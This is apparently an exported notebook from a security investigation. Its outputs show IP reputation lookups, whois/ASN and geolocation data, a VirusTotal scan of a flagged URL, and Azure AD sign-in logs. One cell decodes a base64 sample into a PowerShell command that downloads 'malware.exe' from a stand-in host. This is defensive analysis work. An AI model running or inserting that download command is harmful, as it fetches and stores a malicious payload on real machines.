\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"
\\n\"+\n \"IP Address to lookup is 40.76.220.11
" ], "text/plain": [ "\n", " | Ioc | \n", "IocType | \n", "QuerySubtype | \n", "Provider | \n", "Result | \n", "Severity | \n", "Details | \n", "RawResult | \n", "Reference | \n", "Status | \n", "
---|---|---|---|---|---|---|---|---|---|---|
OTX | \n", "40.76.220.11 | \n", "ipv4 | \n", "None | \n", "OTX | \n", "True | \n", "information | \n", "{'pulse_count': 0, 'sections_available': ['general', 'geo', 'reputation', 'url_list', 'passive_d... | \n", "{'whois': 'http://whois.domaintools.com/40.76.220.11', 'reputation': 0, 'indicator': '40.76.220.... | \n", "https://otx.alienvault.com/api/v1/indicators/IPv4/40.76.220.11/general | \n", "0 | \n", "
OPR | \n", "40.76.220.11 | \n", "ipv4 | \n", "None | \n", "OPR | \n", "False | \n", "information | \n", "IoC type ipv4 not supported. | \n", "None | \n", "None | \n", "1 | \n", "
Tor | \n", "40.76.220.11 | \n", "ipv4 | \n", "None | \n", "Tor | \n", "True | \n", "information | \n", "Not found. | \n", "None | \n", "https://check.torproject.org/exit-addresses | \n", "0 | \n", "
VirusTotal | \n", "40.76.220.11 | \n", "ipv4 | \n", "None | \n", "VirusTotal | \n", "True | \n", "information | \n", "{'verbose_msg': 'Missing IP address', 'response_code': 0, 'positives': 0} | \n", "{'response_code': 0, 'verbose_msg': 'Missing IP address'} | \n", "https://www.virustotal.com/vtapi/v2/ip-address/report | \n", "0 | \n", "
XForce | \n", "40.76.220.11 | \n", "ipv4 | \n", "None | \n", "XForce | \n", "True | \n", "information | \n", "{'score': 1, 'cats': {}, 'categoryDescriptions': {}, 'reason': 'Regional Internet Registry', 're... | \n", "{'ip': '40.76.220.11', 'history': [{'created': '2012-03-22T07:26:00.000Z', 'reason': 'Regional I... | \n", "https://api.xforce.ibmcloud.com/ipr/40.76.220.11 | \n", "0 | \n", "
OTX | |
pulse_count | 0 |
sections_available | ['general', 'geo', 'reputation', 'url_list', 'passive_dns', 'malware', 'nids_list', 'http_scans'] |
{'accuracy_radius': 1000,\n", "
'area_code': 0,
'asn': 'AS8075 MICROSOFT-CORP-MSN-AS-BLOCK',
'base_indicator': {},
'charset': 0,
'city': 'Washington',
'city_data': True,
'continent_code': 'NA',
'country_code': 'US',
'country_code2': 'US',
'country_code3': 'USA',
'country_name': 'United States of America',
'dma_code': 511,
'false_positive': [],
'flag_title': 'United States of America',
'flag_url': '/assets/images/flags/us.png',
'indicator': '40.76.220.11',
'latitude': 38.7095,
'longitude': -78.1539,
'postal_code': '22747',
'pulse_info': {'count': 0,
'pulses': [],
'references': [],
'related': {'alienvault': {'adversary': [],
'industries': [],
'malware_families': []},
'other': {'adversary': [],
'industries': [],
'malware_families': []}}},
'region': 'VA',
'reputation': 0,
'sections': ['general',
'geo',
'reputation',
'url_list',
'passive_dns',
'malware',
'nids_list',
'http_scans'],
'subdivision': 'VA',
'type': 'IPv4',
'type_title': 'IPv4',
'validation': [{'message': 'In cloud provider range: provider=azure',
'name': 'Cloud Provider IP range',
'source': 'cloud'}],
'whois': 'http://whois.domaintools.com/40.76.220.11'}
None\n", "
VirusTotal | |
verbose_msg | Missing IP address |
response_code | 0 |
positives | 0 |
{'response_code': 0, 'verbose_msg': 'Missing IP address'}\n", "
XForce | |
score | 1 |
cats | |
categoryDescriptions | |
reason | Regional Internet Registry |
reasonDescription | One of the five RIRs announced a (new) location mapping of the IP. |
tags | [] |
{'categoryDescriptions': {},\n", "
'cats': {},
'geo': {'country': 'United States', 'countrycode': 'US'},
'history': [{'categoryDescriptions': {},
'cats': {},
'created': '2012-03-22T07:26:00.000Z',
'geo': {'country': 'United States', 'countrycode': 'US'},
'ip': '40.0.0.0/8',
'reason': 'Regional Internet Registry',
'reasonDescription': 'One of the five RIRs announced a (new) '
'location mapping of the IP.',
'score': 1},
{'asns': {'8075': {'Company': 'MICROSOFT-CORP-MSN-AS-BLOCK - '
'Microsoft Corporation, US',
'cidr': 10}},
'categoryDescriptions': {},
'cats': {},
'created': '2017-07-26T06:24:00.000Z',
'deleted': True,
'geo': {'country': 'United States', 'countrycode': 'US'},
'ip': '40.76.0.0/14',
'reason': 'Regional Internet Registry',
'reasonDescription': 'One of the five RIRs announced a (new) '
'location mapping of the IP.',
'score': 1},
{'categoryDescriptions': {},
'cats': {},
'created': '2017-10-10T06:23:00.000Z',
'deleted': True,
'geo': {'country': 'United States', 'countrycode': 'US'},
'ip': '40.76.0.0/14',
'reason': 'Regional Internet Registry',
'reasonDescription': 'One of the five RIRs announced a (new) '
'location mapping of the IP.',
'score': 1},
{'asns': {'8075': {'Company': 'MICROSOFT-CORP-MSN-AS-BLOCK - '
'Microsoft Corporation, US',
'cidr': 10}},
'categoryDescriptions': {},
'cats': {},
'created': '2017-10-18T06:23:00.000Z',
'deleted': True,
'geo': {'country': 'United States', 'countrycode': 'US'},
'ip': '40.76.0.0/14',
'reason': 'Regional Internet Registry',
'reasonDescription': 'One of the five RIRs announced a (new) '
'location mapping of the IP.',
'score': 1},
{'categoryDescriptions': {},
'cats': {},
'created': '2019-05-19T06:52:00.000Z',
'deleted': True,
'geo': {'country': 'United States', 'countrycode': 'US'},
'ip': '40.76.0.0/14',
'reason': 'Regional Internet Registry',
'reasonDescription': 'One of the five RIRs announced a (new) '
'location mapping of the IP.',
'score': 1},
{'categoryDescriptions': {},
'cats': {},
'created': '2019-05-21T14:39:00.000Z',
'deleted': True,
'geo': {'country': 'United States', 'countrycode': 'US'},
'ip': '40.76.0.0/14',
'reason': 'Regional Internet Registry',
'reasonDescription': 'One of the five RIRs announced a (new) '
'location mapping of the IP.',
'score': 1},
{'categoryDescriptions': {},
'cats': {},
'created': '2020-01-17T09:09:00.000Z',
'deleted': True,
'geo': {'country': 'United States', 'countrycode': 'US'},
'ip': '40.76.0.0/14',
'reason': 'Regional Internet Registry',
'reasonDescription': 'One of the five RIRs announced a (new) '
'location mapping of the IP.',
'score': 1},
{'categoryDescriptions': {},
'cats': {},
'created': '2020-03-21T07:52:00.000Z',
'deleted': True,
'geo': {'country': 'United States', 'countrycode': 'US'},
'ip': '40.76.0.0/14',
'reason': 'Regional Internet Registry',
'reasonDescription': 'One of the five RIRs announced a (new) '
'location mapping of the IP.',
'score': 1},
{'categoryDescriptions': {},
'cats': {},
'created': '2020-03-22T07:54:00.000Z',
'deleted': True,
'geo': {'country': 'United States', 'countrycode': 'US'},
'ip': '40.76.0.0/14',
'reason': 'Regional Internet Registry',
'reasonDescription': 'One of the five RIRs announced a (new) '
'location mapping of the IP.',
'score': 1},
{'categoryDescriptions': {},
'cats': {},
'created': '2020-06-06T06:52:00.000Z',
'deleted': True,
'geo': {'country': 'United States', 'countrycode': 'US'},
'ip': '40.76.0.0/14',
'reason': 'Regional Internet Registry',
'reasonDescription': 'One of the five RIRs announced a (new) '
'location mapping of the IP.',
'score': 1},
{'categoryDescriptions': {},
'cats': {},
'created': '2020-07-11T06:52:00.000Z',
'deleted': True,
'geo': {'country': 'United States', 'countrycode': 'US'},
'ip': '40.76.0.0/14',
'reason': 'Regional Internet Registry',
'reasonDescription': 'One of the five RIRs announced a (new) '
'location mapping of the IP.',
'score': 1},
{'categoryDescriptions': {},
'cats': {},
'created': '2020-07-11T06:53:00.000Z',
'deleted': True,
'geo': {'country': 'United States', 'countrycode': 'US'},
'ip': '40.76.0.0/14',
'reason': 'Regional Internet Registry',
'reasonDescription': 'One of the five RIRs announced a (new) '
'location mapping of the IP.',
'score': 1}],
'ip': '40.76.220.11',
'reason': 'Regional Internet Registry',
'reasonDescription': 'One of the five RIRs announced a (new) location mapping '
'of the IP.',
'score': 1,
'subnets': [{'asns': {'8075': {'cidr': 10, 'removed': True}},
'categoryDescriptions': {},
'cats': {},
'created': '2020-07-11T06:53:00.000Z',
'ip': '40.64.0.0',
'reason': 'Regional Internet Registry',
'reasonDescription': 'One of the five RIRs announced a (new) '
'location mapping of the IP.',
'reason_removed': True,
'score': 1,
'subnet': '40.64.0.0/10'},
{'asns': {'8075': {'Company': 'MICROSOFT-CORP-MSN-AS-BLOCK, US',
'cidr': 14}},
'categoryDescriptions': {},
'cats': {},
'created': '2020-07-11T06:52:00.000Z',
'geo': {'country': 'United States', 'countrycode': 'US'},
'ip': '40.76.0.0',
'reason': 'Regional Internet Registry',
'reasonDescription': 'One of the five RIRs announced a (new) '
'location mapping of the IP.',
'score': 1,
'subnet': '40.76.0.0/14'}],
'tags': []}
\n", " | 0 | \n", "
---|---|
reference | \n", "(, 1., 1) | \n", "
original_string | \n", "SW52b2tlLVdlYlJlcXVlc3QgaHR0cHM6Ly9jb250b3NvLmNvbS9tYWx3YXJlIC1PdXRGaWxlIEM6XG1hbHdhcmUuZXhl | \n", "
file_name | \n", "unknown | \n", "
file_type | \n", "None | \n", "
input_bytes | \n", "b'Invoke-WebRequest https://contoso.com/malware -OutFile C:\\\\malware.exe' | \n", "
decoded_string | \n", "Invoke-WebRequest https://contoso.com/malware -OutFile C:\\malware.exe | \n", "
encoding_type | \n", "utf-8 | \n", "
file_hashes | \n", "{'md5': '5845a06d7f52b1818a088e889df95c77', 'sha1': '1c31052c4aabb853777c1ce74943cafe27bb1d42', ... | \n", "
md5 | \n", "5845a06d7f52b1818a088e889df95c77 | \n", "
sha1 | \n", "1c31052c4aabb853777c1ce74943cafe27bb1d42 | \n", "
sha256 | \n", "7054dcebb2f74492c06f4ba89cac8e7e99b44e1a6029e0ad403aab9bb7503d8c | \n", "
printable_bytes | \n", "49 6e 76 6f 6b 65 2d 57 65 62 52 65 71 75 65 73 74 20 68 74 74 70 73 3a 2f 2f 63 6f 6e 74 6f 73 ... | \n", "
\n", " | qname | \n", "rdtype | \n", "rdclass | \n", "response | \n", "nameserver | \n", "port | \n", "canonical_name | \n", "rrset | \n", "expiration | \n", "url_domain | \n", "src_row_index | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|
0 | \n", "www.microsoft.com. | \n", "1 | \n", "1 | \n", "id 32410\\nopcode QUERY\\nrcode NOERROR\\nflags QR RD RA\\n;QUESTION\\nwww.microsoft.com. IN A\\n;ANSW... | \n", "None | \n", "None | \n", "e13678.dscb.akamaiedge.net. | \n", "[23.218.110.52] | \n", "2021-06-28 21:58:32.828779 | \n", "www.microsoft.com | \n", "0 | \n", "
\n", " | subdomain | \n", "domain | \n", "suffix | \n", "src_row_index | \n", "
---|---|---|---|---|
0 | \n", "www | \n", "www.microsoft.com | \n", "com | \n", "0 | \n", "
\n", " | ip | \n", "result | \n", "src_row_index | \n", "
---|---|---|---|
0 | \n", "24.16.133.227 | \n", "Public | \n", "0 | \n", "
\n", " | asn | \n", "asn_cidr | \n", "asn_country_code | \n", "asn_date | \n", "asn_description | \n", "asn_registry | \n", "nets | \n", "nir | \n", "query | \n", "raw | \n", "raw_referral | \n", "referral | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | \n", "7922 | \n", "24.16.0.0/13 | \n", "US | \n", "2003-10-06 | \n", "COMCAST-7922, US | \n", "arin | \n", "[{'cidr': '24.0.0.0/12, 24.16.0.0/13', 'name': 'EASTERNSHORE-1', 'handle': 'NET-24-0-0-0-1', 'ra... | \n", "None | \n", "24.16.133.227 | \n", "None | \n", "None | \n", "None | \n", "
\n", " | CountryCode | \n", "CountryName | \n", "State | \n", "City | \n", "Longitude | \n", "Latitude | \n", "Asn | \n", "edges | \n", "Type | \n", "AdditionalData | \n", "IpAddress | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|
0 | \n", "US | \n", "United States | \n", "Washington | \n", "Bellevue | \n", "-122.2053 | \n", "47.6131 | \n", "None | \n", "{} | \n", "geolocation | \n", "{} | \n", "24.16.133.227 | \n", "
\n", " | nir | \n", "asn_registry | \n", "asn | \n", "asn_cidr | \n", "asn_country_code | \n", "asn_date | \n", "asn_description | \n", "query | \n", "nets | \n", "raw | \n", "referral | \n", "raw_referral | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | \n", "None | \n", "arin | \n", "8075 | \n", "40.76.0.0/14 | \n", "US | \n", "2015-02-23 | \n", "MICROSOFT-CORP-MSN-AS-BLOCK, US | \n", "40.76.220.11 | \n", "[{'cidr': '40.80.0.0/12, 40.120.0.0/14, 40.76.0.0/14, 40.112.0.0/13, 40.74.0.0/15, 40.124.0.0/16... | \n", "None | \n", "None | \n", "None | \n", "
2 | \n", "None | \n", "ripencc | \n", "3216 | \n", "81.211.96.0/19 | \n", "RU | \n", "2002-11-04 | \n", "SOVAM-AS, RU | \n", "81.211.111.100 | \n", "[{'cidr': '81.211.111.96/27', 'name': 'SOVINTEL-GlobusAvia', 'handle': 'BN891-RIPE', 'range': '8... | \n", "None | \n", "None | \n", "None | \n", "
3 | \n", "None | \n", "ripencc | \n", "12400 | \n", "87.71.160.0/19 | \n", "IL | \n", "2005-06-30 | \n", "PARTNER-AS, IL | \n", "87.71.180.127 | \n", "[{'cidr': '87.71.176.0/21', 'name': 'DHCP-121-OD', 'handle': 'DR5299-RIPE', 'range': '87.71.176.... | \n", "None | \n", "None | \n", "None | \n", "
5 | \n", "None | \n", "ripencc | \n", "15557 | \n", "89.156.0.0/14 | \n", "FR | \n", "2006-04-11 | \n", "LDCOMNET, FR | \n", "89.159.53.43 | \n", "[{'cidr': '89.156.0.0/14', 'name': 'FR-SFR-20050726', 'handle': 'LD699-RIPE', 'range': '89.156.0... | \n", "None | \n", "None | \n", "None | \n", "
6 | \n", "None | \n", "ripencc | \n", "12849 | \n", "5.29.48.0/21 | \n", "IL | \n", "2012-05-08 | \n", "HOTNET-IL AMS-IX Admin LAN, IL | \n", "5.29.52.252 | \n", "[{'cidr': '5.29.48.0/21', 'name': 'HOTNET-4', 'handle': 'AL8020-RIPE', 'range': '5.29.48.0 - 5.2... | \n", "None | \n", "None | \n", "None | \n", "
\n", " | IPAddress | \n", "AppDisplayName | \n", "TimeGenerated | \n", "nir | \n", "asn_registry | \n", "asn | \n", "asn_cidr | \n", "asn_country_code | \n", "asn_date | \n", "asn_description | \n", "query | \n", "nets | \n", "raw | \n", "referral | \n", "raw_referral | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | \n", "40.76.220.11 | \n", "Microsoft Azure Active Directory Connect | \n", "2021-06-28 10:55:21.648000+00:00 | \n", "None | \n", "arin | \n", "8075 | \n", "40.76.0.0/14 | \n", "US | \n", "2015-02-23 | \n", "MICROSOFT-CORP-MSN-AS-BLOCK, US | \n", "40.76.220.11 | \n", "[{'cidr': '40.80.0.0/12, 40.120.0.0/14, 40.76.0.0/14, 40.112.0.0/13, 40.74.0.0/15, 40.124.0.0/16... | \n", "None | \n", "None | \n", "None | \n", "
1 | \n", "81.211.111.100 | \n", "Azure Portal | \n", "2021-06-28 11:36:15.896000+00:00 | \n", "None | \n", "ripencc | \n", "3216 | \n", "81.211.96.0/19 | \n", "RU | \n", "2002-11-04 | \n", "SOVAM-AS, RU | \n", "81.211.111.100 | \n", "[{'cidr': '81.211.111.96/27', 'name': 'SOVINTEL-GlobusAvia', 'handle': 'BN891-RIPE', 'range': '8... | \n", "None | \n", "None | \n", "None | \n", "
2 | \n", "87.71.180.127 | \n", "Azure Portal | \n", "2021-06-28 12:24:50.274000+00:00 | \n", "None | \n", "ripencc | \n", "12400 | \n", "87.71.160.0/19 | \n", "IL | \n", "2005-06-30 | \n", "PARTNER-AS, IL | \n", "87.71.180.127 | \n", "[{'cidr': '87.71.176.0/21', 'name': 'DHCP-121-OD', 'handle': 'DR5299-RIPE', 'range': '87.71.176.... | \n", "None | \n", "None | \n", "None | \n", "
3 | \n", "89.159.53.43 | \n", "Azure Portal | \n", "2021-06-28 12:24:40.501000+00:00 | \n", "None | \n", "ripencc | \n", "15557 | \n", "89.156.0.0/14 | \n", "FR | \n", "2006-04-11 | \n", "LDCOMNET, FR | \n", "89.159.53.43 | \n", "[{'cidr': '89.156.0.0/14', 'name': 'FR-SFR-20050726', 'handle': 'LD699-RIPE', 'range': '89.156.0... | \n", "None | \n", "None | \n", "None | \n", "
4 | \n", "5.29.52.252 | \n", "Azure Advanced Threat Protection | \n", "2021-06-28 12:36:12.329000+00:00 | \n", "None | \n", "ripencc | \n", "12849 | \n", "5.29.48.0/21 | \n", "IL | \n", "2012-05-08 | \n", "HOTNET-IL AMS-IX Admin LAN, IL | \n", "5.29.52.252 | \n", "[{'cidr': '5.29.48.0/21', 'name': 'HOTNET-4', 'handle': 'AL8020-RIPE', 'range': '5.29.48.0 - 5.2... | \n", "None | \n", "None | \n", "None | \n", "
\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"
\\n\"+\n \"VirusTotal | |
verbose_msg | Scan finished, scan information embedded in this object |
response_code | 1 |
positives | 8 |
resource | http://85.214.149.236:443/sugarcrm/themes/default/images/ |
permalink | https://www.virustotal.com/gui/url/5cfb347b4631f015338e0c143de3b67926e7dc53b048e3dcc927d78bd0f40b55/detection/u-5cfb347b4631f015338e0c143de3b67926e7dc53b048e3dcc927d78bd0f40b55-1624240252 |
{'filescan_id': None,\n", "
'permalink': 'https://www.virustotal.com/gui/url/5cfb347b4631f015338e0c143de3b67926e7dc53b048e3dcc927d78bd0f40b55/detection/u-5cfb347b4631f015338e0c143de3b67926e7dc53b048e3dcc927d78bd0f40b55-1624240252',
'positives': 8,
'resource': 'http://85.214.149.236:443/sugarcrm/themes/default/images/',
'response_code': 1,
'scan_date': '2021-06-21 01:50:52',
'scan_id': '5cfb347b4631f015338e0c143de3b67926e7dc53b048e3dcc927d78bd0f40b55-1624240252',
'scans': {'ADMINUSLabs': {'detected': False, 'result': 'clean site'},
'AICC (MONITORAPP)': {'detected': False, 'result': 'clean site'},
'AegisLab WebGuard': {'detected': False, 'result': 'clean site'},
'AlienVault': {'detected': False, 'result': 'clean site'},
'Antiy-AVL': {'detected': False, 'result': 'clean site'},
'Armis': {'detected': False, 'result': 'clean site'},
'Artists Against 419': {'detected': False, 'result': 'clean site'},
'AutoShun': {'detected': False, 'result': 'unrated site'},
'Avira': {'detected': False, 'result': 'clean site'},
'BADWARE.INFO': {'detected': False, 'result': 'clean site'},
'Baidu-International': {'detected': False, 'result': 'clean site'},
'Bfore.Ai PreCrime': {'detected': False, 'result': 'clean site'},
'BitDefender': {'detected': False, 'result': 'clean site'},
'BlockList': {'detected': False, 'result': 'clean site'},
'Blueliv': {'detected': False, 'result': 'clean site'},
'CINS Army': {'detected': False, 'result': 'clean site'},
'CLEAN MX': {'detected': False, 'result': 'clean site'},
'CMC Threat Intelligence': {'detected': False,
'result': 'clean site'},
'CRDF': {'detected': False, 'result': 'clean site'},
'Certego': {'detected': False, 'result': 'clean site'},
'Cisco Talos IP Blacklist': {'detected': False,
'result': 'clean site'},
'Comodo Valkyrie Verdict': {'detected': False,
'result': 'clean site'},
'CyRadar': {'detected': True, 'result': 'malicious site'},
'Cyan': {'detected': False, 'result': 'unrated site'},
'CyberCrime': {'detected': False, 'result': 'clean site'},
'Cyren': {'detected': False, 'result': 'clean site'},
'DNS8': {'detected': False, 'result': 'clean site'},
'Dr.Web': {'detected': False, 'result': 'clean site'},
'ESET': {'detected': True, 'result': 'malware site'},
'ESTsecurity-Threat Inside': {'detected': True,
'result': 'malicious site'},
'EmergingThreats': {'detected': False, 'result': 'clean site'},
'Emsisoft': {'detected': False, 'result': 'clean site'},
'EonScope': {'detected': False, 'result': 'clean site'},
'Feodo Tracker': {'detected': False, 'result': 'clean site'},
'Forcepoint ThreatSeeker': {'detected': False,
'result': 'suspicious site'},
'Fortinet': {'detected': True, 'result': 'malware site'},
'FraudScore': {'detected': False, 'result': 'clean site'},
'G-Data': {'detected': False, 'result': 'clean site'},
'Google Safebrowsing': {'detected': False, 'result': 'clean site'},
'GreenSnow': {'detected': False, 'result': 'clean site'},
'Hoplite Industries': {'detected': False, 'result': 'clean site'},
'IPsum': {'detected': False, 'result': 'clean site'},
'K7AntiVirus': {'detected': False, 'result': 'clean site'},
'Kaspersky': {'detected': False, 'result': 'unrated site'},
'Lumu': {'detected': False, 'result': 'unrated site'},
'MalBeacon': {'detected': False, 'result': 'clean site'},
'MalSilo': {'detected': False, 'result': 'clean site'},
'MalwareDomainList': {'detail': 'http://www.malwaredomainlist.com/mdl.php?search=85.214.149.236',
'detected': False,
'result': 'clean site'},
'MalwarePatrol': {'detected': False, 'result': 'clean site'},
'Malwared': {'detected': False, 'result': 'clean site'},
'Netcraft': {'detected': True, 'result': 'malicious site'},
'NotMining': {'detected': False, 'result': 'unrated site'},
'Nucleon': {'detected': False, 'result': 'clean site'},
'OpenPhish': {'detected': False, 'result': 'clean site'},
'PREBYTES': {'detected': False, 'result': 'clean site'},
'PhishLabs': {'detected': False, 'result': 'unrated site'},
'Phishing Database': {'detected': False, 'result': 'clean site'},
'Phishtank': {'detected': False, 'result': 'clean site'},
'Quick Heal': {'detected': False, 'result': 'clean site'},
'Quttera': {'detected': False, 'result': 'clean site'},
'Rising': {'detected': False, 'result': 'clean site'},
'SCUMWARE.org': {'detected': False, 'result': 'clean site'},
'SafeToOpen': {'detected': False, 'result': 'unrated site'},
'Sangfor': {'detected': False, 'result': 'clean site'},
'Scantitan': {'detected': False, 'result': 'clean site'},
'SecureBrain': {'detected': False, 'result': 'clean site'},
'Sophos': {'detected': True, 'result': 'malware site'},
'Spam404': {'detected': False, 'result': 'clean site'},
'Spamhaus': {'detected': False, 'result': 'clean site'},
'StopBadware': {'detected': False, 'result': 'unrated site'},
'StopForumSpam': {'detected': False, 'result': 'clean site'},
'Sucuri SiteCheck': {'detected': False, 'result': 'clean site'},
'Tencent': {'detected': False, 'result': 'clean site'},
'ThreatHive': {'detected': False, 'result': 'clean site'},
'Threatsourcing': {'detected': False, 'result': 'clean site'},
'Trustwave': {'detected': False, 'result': 'clean site'},
'URLhaus': {'detected': False, 'result': 'clean site'},
'VX Vault': {'detected': False, 'result': 'clean site'},
'Virusdie External Site Scan': {'detected': False,
'result': 'clean site'},
'Web Security Guard': {'detected': False, 'result': 'clean site'},
'Webroot': {'detected': True, 'result': 'malicious site'},
'Yandex Safebrowsing': {'detail': 'http://yandex.com/infected?l10n=en&url=http://85.214.149.236:443/sugarcrm/themes/default/images/',
'detected': False,
'result': 'clean site'},
'ZeroCERT': {'detected': False, 'result': 'clean site'},
'alphaMountain.ai': {'detected': True, 'result': 'malicious site'},
'benkow.cc': {'detected': False, 'result': 'clean site'},
'desenmascara.me': {'detected': False, 'result': 'clean site'},
'malwares.com URL checker': {'detected': False,
'result': 'clean site'},
'securolytics': {'detected': False, 'result': 'clean site'},
'zvelo': {'detected': False, 'result': 'clean site'}},
'total': 89,
'url': 'http://85.214.149.236:443/sugarcrm/themes/default/images/',
'verbose_msg': 'Scan finished, scan information embedded in this object'}
\n", " | TenantId | \n", "SourceSystem | \n", "TimeGenerated | \n", "ResourceId | \n", "OperationName | \n", "OperationVersion | \n", "Category | \n", "ResultType | \n", "ResultSignature | \n", "ResultDescription | \n", "DurationMs | \n", "CorrelationId | \n", "Resource | \n", "ResourceGroup | \n", "ResourceProvider | \n", "Identity | \n", "Level | \n", "Location | \n", "AlternateSignInName | \n", "AppDisplayName | \n", "AppId | \n", "AuthenticationDetails | \n", "AuthenticationMethodsUsed | \n", "AuthenticationProcessingDetails | \n", "AuthenticationRequirement | \n", "... | \n", "RiskLevelDuringSignIn | \n", "RiskState | \n", "ResourceDisplayName | \n", "ResourceIdentity | \n", "ServicePrincipalId | \n", "ServicePrincipalName | \n", "Status | \n", "TokenIssuerName | \n", "TokenIssuerType | \n", "UserAgent | \n", "UserDisplayName | \n", "UserId | \n", "UserPrincipalName | \n", "AADTenantId | \n", "UserType | \n", "FlaggedForReview | \n", "IPAddressFromResourceProvider | \n", "SignInIdentifier | \n", "SignInIdentifierType | \n", "ResourceTenantId | \n", "HomeTenantId | \n", "Type | \n", "Result | \n", "Latitude | \n", "Longitude | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure AD | \n", "2021-06-28 10:55:21.648000+00:00 | \n", "/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam | \n", "Sign-in activity | \n", "1.0 | \n", "SignInLogs | \n", "0 | \n", "None | \n", "\n", " | 0 | \n", "9558f30b-a1db-4676-a586-7db608bdaa69 | \n", "Microsoft.aadiam | \n", "Microsoft.aadiam | \n", "\n", " | On-Premises Directory Synchronization Service Account | \n", "4 | \n", "US | \n", "Sync_AADCON_a5225d32ba79@seccxpninja.onmicrosoft.com | \n", "Microsoft Azure Active Directory Connect | \n", "cb1056e2-e479-49de-ae31-7812af012ed8 | \n", "[\\r\\n {\\r\\n \"authenticationStepDateTime\": \"2021-06-28T10:55:21.6485011+00:00\",\\r\\n \"authe... | \n", "\n", " | [\\r\\n {\\r\\n \"key\": \"IsCAEToken\",\\r\\n \"value\": \"False\"\\r\\n }\\r\\n] | \n", "singleFactorAuthentication | \n", "... | \n", "none | \n", "none | \n", "Windows Azure Active Directory | \n", "00000002-0000-0000-c000-000000000000 | \n", "\n", " | \n", " | {'errorCode': 0} | \n", "\n", " | AzureAD | \n", "\n", " | On-Premises Directory Synchronization Service Account | \n", "2235a468-ad9c-4375-8008-0a7be76994a7 | \n", "sync_aadcon_a5225d32ba79@seccxpninja.onmicrosoft.com | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Member | \n", "None | \n", "\n", " | Sync_AADCON_a5225d32ba79@seccxpninja.onmicrosoft.com | \n", "\n", " | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "SigninLogs | \n", "Sucess | \n", "38.73078155517578 | \n", "-78.17196655273438 | \n", "
1 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure AD | \n", "2021-06-28 10:55:26.252000+00:00 | \n", "/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam | \n", "Sign-in activity | \n", "1.0 | \n", "SignInLogs | \n", "0 | \n", "None | \n", "\n", " | 0 | \n", "dac1edbe-1985-4f78-8d20-f4725e28b865 | \n", "Microsoft.aadiam | \n", "Microsoft.aadiam | \n", "\n", " | On-Premises Directory Synchronization Service Account | \n", "4 | \n", "US | \n", "Sync_AADCON_a5225d32ba79@seccxpninja.onmicrosoft.com | \n", "Microsoft Azure Active Directory Connect | \n", "cb1056e2-e479-49de-ae31-7812af012ed8 | \n", "[\\r\\n {\\r\\n \"authenticationStepDateTime\": \"2021-06-28T10:55:26.2522747+00:00\",\\r\\n \"authe... | \n", "\n", " | [\\r\\n {\\r\\n \"key\": \"IsCAEToken\",\\r\\n \"value\": \"False\"\\r\\n }\\r\\n] | \n", "singleFactorAuthentication | \n", "... | \n", "none | \n", "none | \n", "Windows Azure Active Directory | \n", "00000002-0000-0000-c000-000000000000 | \n", "\n", " | \n", " | {'errorCode': 0} | \n", "\n", " | AzureAD | \n", "\n", " | On-Premises Directory Synchronization Service Account | \n", "2235a468-ad9c-4375-8008-0a7be76994a7 | \n", "sync_aadcon_a5225d32ba79@seccxpninja.onmicrosoft.com | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "Member | \n", "None | \n", "\n", " | Sync_AADCON_a5225d32ba79@seccxpninja.onmicrosoft.com | \n", "\n", " | 4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "4b2462a4-bbee-495a-a0e1-f23ae524cc9c | \n", "SigninLogs | \n", "Sucess | \n", "38.7130012512207 | \n", "-78.15899658203125 | \n", "
